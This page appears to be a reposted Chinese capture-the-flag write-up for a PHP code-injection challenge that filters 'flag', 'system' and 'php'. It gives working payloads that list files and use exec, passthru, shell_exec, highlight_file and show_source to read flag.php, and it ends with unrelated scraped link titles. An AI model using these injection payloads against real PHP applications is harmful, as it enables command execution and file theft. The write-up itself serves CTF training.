当前位置: 首页 > wzjs >正文

大型网站设计公司湖州吴兴建设局网站

wzjs 2025/9/20 13:51:11
大型网站设计公司,湖州吴兴建设局网站,自己做一个网站一年的费用,如何做 网站映射信息收集 题目将flag system php不区分大小写地过滤了 解题 前置知识 print_r:php中用于打印数组 scandir:php中用于获取指点目录下的所以文件目录名 getcwd:获取当前目录 目录获取 这里提供两种方法 print_r(scandir(getcwd())); pri…

信息收集

题目将flag system php不区分大小写地过滤了
在这里插入图片描述

解题

前置知识

print_r:php中用于打印数组
scandir:php中用于获取指点目录下的所以文件目录名
getcwd:获取当前目录

目录获取

这里提供两种方法
print_r(scandir(getcwd()));
print_r(scandir("."));

在这里插入图片描述

获取flag

我只提供一些思路,起到抛砖引玉的作用,我也不可能列举所有的方案

方法1

只过滤$c,我们只要不在c里写那些关键词就可以了
可以在php里执行系统指令的函数有:exec(), system(), passthru(), shell_exec()
这四个函数详细情况参考https://www.jb51.net/program/2850207z8.htm
ban掉了system还有三个,任选一个即可

?c=exec($_GET[1], $a);print_r($a);&1=tac flag.php
?c=passthru($_GET[1]);&1=tac flag.php
?c=echo shell_exec($_GET[1]);&1=tac flag.php
?c=echo shell_exec("tac fla*"); //tac fla?????

在这里插入图片描述

方法2

不使用系统指令,使用php函数同样可以

?c=highlight_file($_GET[1]);&1=flag.php
?c=show_source($_GET[1]);&1=flag.php

在这里插入图片描述
web    目录    web

http://www.dtcms.com/wzjs/804785.html

相关文章:

  • 石家庄建设企业网站山东青岛68元建网站
  • dedecms 调用网站内部搜索怎么创建免费的个人网站
  • 做微信公众号的网站有哪些优化推广seo
  • 怀化职院网站办公空间设计网站
  • 潍坊网站建设价格互联网保险的发展
  • 免费的行情网站app软件app手机软件开发
  • 金融商城快捷申请网站模板下载网络投票程序
  • 做网站需要写那些xmind乡镇网站个人做可以不
  • 英文网站建设用途创客贴设计网站官网
  • 门户网站建设哪专业网页特效代码
  • 枣庄做网站建设的公司国内平面设计公司
  • 网站开发需要的资源织梦做商城类网站教程
  • 网站项目开发的一般流程众筹平台网站搭建
  • 学校网站建设计划书个人网站设计怎么做
  • 宝安网站制作公司电子商务网站建站目的
  • 河南网站推广如何在阿里云做网站
  • 卡地亚手表官方网站查询优化wordpress调用文章函数
  • 做网页局域网站点配置单页网站模板
  • 做公司网站的理念廊坊企业做网站
  • 建筑行业资讯网站wordpress电商模板
  • asp.net 项目成本预算系统的 网站开发知名企业排名
  • 如何规划一个外贸网站网站 做实名认证
  • 新开传奇最大网站999企业网站页脚信息
  • 自家房子做民宿的网站秀色直播app软件大全
  • 做头像的网站自己的名字wordpress如何制作模板
  • 云南云岭建设集团官方网站装修公司设计图
  • 一个企业seo网站的优化流程网站建站平台eazyshop
  • 互联网网站开发百度推广客户端下载安装
  • 大连项目备案网站网站建设新零售
  • 可视化编辑网站开发电子商务网站设计原则